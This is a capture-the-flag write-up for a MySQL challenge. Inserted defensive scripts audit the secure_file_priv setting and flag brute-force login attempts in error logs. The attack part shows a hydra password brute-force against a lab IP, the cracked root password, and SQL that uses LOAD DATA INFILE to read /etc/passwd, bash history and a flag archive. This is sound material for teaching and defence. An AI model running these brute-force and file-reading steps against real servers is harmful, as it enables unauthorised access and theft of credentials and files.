DESCRIPTION
As a security incident investigator you have to gain access to the company's database server. A disgruntled employee, before she got fired, disabled all services on the database server, but the MySQL database is still running. Rumours say that the password for the database administrator is not very complex and can be brute-forced. Also, someone mentioned that this database server has an empty secure-file-priv setting in its configuration.
QUESTION
Your task is to get the flag from the MySQL database user's home folder.
The MySQL server is located at:
10.12.32.139
An empty secure-file-priv is considered bad practice.
This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege. An empty value means no path restriction at all, so a FILE-privileged account can read or write wherever the server process itself can.
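The setting is easy to audit before an incident. The script below is an added example, not part of the original writeup or of MySQL itself: the function name `audit_secure_file_priv`, the verdict words and the three option files it writes to temporary paths are all assumptions made for the demonstration. It classifies the `[mysqld]` value of `secure_file_priv` (both spellings MySQL accepts) into the states the manual distinguishes, so the empty value from the challenge is reported as weak next to a directory-restricted and a NULL (fully disabled) configuration.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit secure_file_priv in a
# MySQL option file. Only the [mysqld] group is inspected (a simplification;
# MySQL also reads [server] and version-specific groups). Verdicts:
#   weak        key present with an empty value: LOAD DATA INFILE, LOAD_FILE()
#               and SELECT ... INTO OUTFILE may use any path the server can reach
#   restricted  set to a directory: file import/export confined to that directory
#   disabled    set to NULL: file import/export operations switched off
#   default     key absent: the build's default applies; confirm on the live
#               server with: SHOW VARIABLES LIKE 'secure_file_priv';

audit_secure_file_priv() {
    cfg="$1"
    # MySQL accepts secure_file_priv and secure-file-priv; the last setting wins.
    val=$(awk '
        /^[ \t]*[#;]/ { next }                                   # comment lines
        /^[ \t]*\[/ { gsub(/^[ \t]+|[ \t]+$/, ""); section = $0; next }
        section == "[mysqld]" && $0 ~ /^[ \t]*secure[-_]file[-_]priv/ {
            sub(/^[^=]*=?/, "")            # drop the key and the "="
            sub(/[ \t]*#.*$/, "")          # drop a trailing comment
            gsub(/^[ \t]+|[ \t]+$/, "")    # trim whitespace
            gsub(/^"|"$/, "")              # strip surrounding quotes
            found = 1; value = $0
        }
        END { if (found) print "SET:" value; else print "ABSENT" }
    ' "$cfg")
    case "$val" in
        ABSENT)            echo "default" ;;
        SET:)              echo "weak" ;;
        SET:NULL|SET:null) echo "disabled" ;;
        SET:*)             echo "restricted" ;;
    esac
}

# Constructed option files for the demonstration (not the challenge server's config).
WEAK_CFG=$(mktemp); HARD_CFG=$(mktemp); NULL_CFG=$(mktemp)
cat > "$WEAK_CFG" <<'EOF'
[client]
port = 3306
[mysqld]
datadir = /var/lib/mysql
secure_file_priv =
EOF
cat > "$HARD_CFG" <<'EOF'
[mysqld]
datadir = /var/lib/mysql
secure-file-priv = "/var/lib/mysql-files"   # confine file I/O to one directory
local_infile = 0
EOF
cat > "$NULL_CFG" <<'EOF'
[mysqld]
secure_file_priv = NULL   # no file import/export at all
EOF

for cfg in "$WEAK_CFG" "$HARD_CFG" "$NULL_CFG"; do
    printf '%s -> %s\n' "$cfg" "$(audit_secure_file_priv "$cfg")"
done
```

Running it prints weak, restricted and disabled for the three constructed files. The hardened variant also sets `local_infile = 0`, which closes the client-side `LOAD DATA LOCAL` path that `secure_file_priv` does not govern.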
Two steps:

First, brute-force the password:

```bash
hydra -l mysql -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt mysql://10.12.32.139
# FOUND root:alertpaydoubl
mysql -u root -h 10.12.32.139
```
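A wordlist run like the one above leaves a dense trail of failed logins on the server. The script below is an added example, not part of the original writeup: the function `failed_logins_by_host`, the threshold and the error-log lines are constructed for the demonstration (198.51.100.0/24 is a documentation range used as a placeholder), and it assumes the server has been told to log failed logins (`log_error_verbosity=3` on MySQL 8.0, `log_warnings=2` on 5.7), which produces "Access denied for user 'NAME'@'HOST'" entries in the error log. It counts those entries per source host and reports hosts over a threshold.

```shell
#!/bin/sh
# Added example, not part of the original writeup: spot a password-guessing run
# against MySQL from the server's error log, where each failed login is recorded
# as "Access denied for user 'NAME'@'HOST' (using password: ...)" once failed
# logins are logged (log_error_verbosity=3 on MySQL 8.0, log_warnings=2 on 5.7).

# Constructed log lines; 198.51.100.0/24 is a documentation range used as a placeholder.
ERRLOG=$(mktemp)
cat > "$ERRLOG" <<'EOF'
2024-05-01T10:00:00.000000Z 0 [Note] /usr/sbin/mysqld: ready for connections.
2024-05-01T10:02:11.000000Z 12 [Note] Access denied for user 'root'@'198.51.100.23' (using password: YES)
2024-05-01T10:02:11.100000Z 13 [Note] Access denied for user 'root'@'198.51.100.23' (using password: YES)
2024-05-01T10:02:11.200000Z 14 [Note] Access denied for user 'root'@'198.51.100.23' (using password: YES)
2024-05-01T10:02:11.300000Z 15 [Note] Access denied for user 'root'@'198.51.100.23' (using password: YES)
2024-05-01T10:02:11.400000Z 16 [Note] Access denied for user 'mysql'@'198.51.100.23' (using password: YES)
2024-05-01T10:02:11.500000Z 17 [Note] Access denied for user 'mysql'@'198.51.100.23' (using password: YES)
2024-05-01T10:15:42.000000Z 18 [Note] Access denied for user 'app'@'198.51.100.40' (using password: YES)
EOF

# Print "HOST COUNT" for every host with at least THRESHOLD failed logins.
# Usage: failed_logins_by_host LOGFILE [THRESHOLD]
failed_logins_by_host() {
    log="$1"; threshold="${2:-5}"
    grep 'Access denied for user' "$log" \
      | sed -n "s/.*Access denied for user '[^']*'@'\([^']*\)'.*/\1/p" \
      | sort | uniq -c \
      | awk -v t="$threshold" '$1 >= t { print $2, $1 }'
}

failed_logins_by_host "$ERRLOG" 5
```

On the constructed log this prints `198.51.100.23 6` and ignores the single failure from the other host. A threshold over a short time window, fed from the live error log, is the cheap alert; the server-side `Connection_errors_max_connections` style status counters and the `connection_control` plugin (which adds a delay after repeated failures) are the complementary controls on the database itself.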
Second, read the files through the database:

```sql
SHOW DATABASES;
USE dbname;
-- if tbl doesn't exist
CREATE TABLE tbl (x TEXT);
LOAD DATA INFILE "/etc/passwd" INTO TABLE tbl;
SELECT * FROM tbl;
LOAD DATA INFILE "/home/mysql/.bash_history" INTO TABLE tbl;
SELECT * FROM tbl;
LOAD DATA INFILE "/home/mysql/flag.zip" INTO TABLE tbl;
SELECT * FROM tbl;
```
Copy the files out and unzip flag.zip with the password EeNgo9oaraim, which you got from the bash history file.
We basically solved this challenge in the last 10 remaining minutes of the CTF, but we were a few minutes late to submit the flag. This one task would have guaranteed us 1st place... GGWP!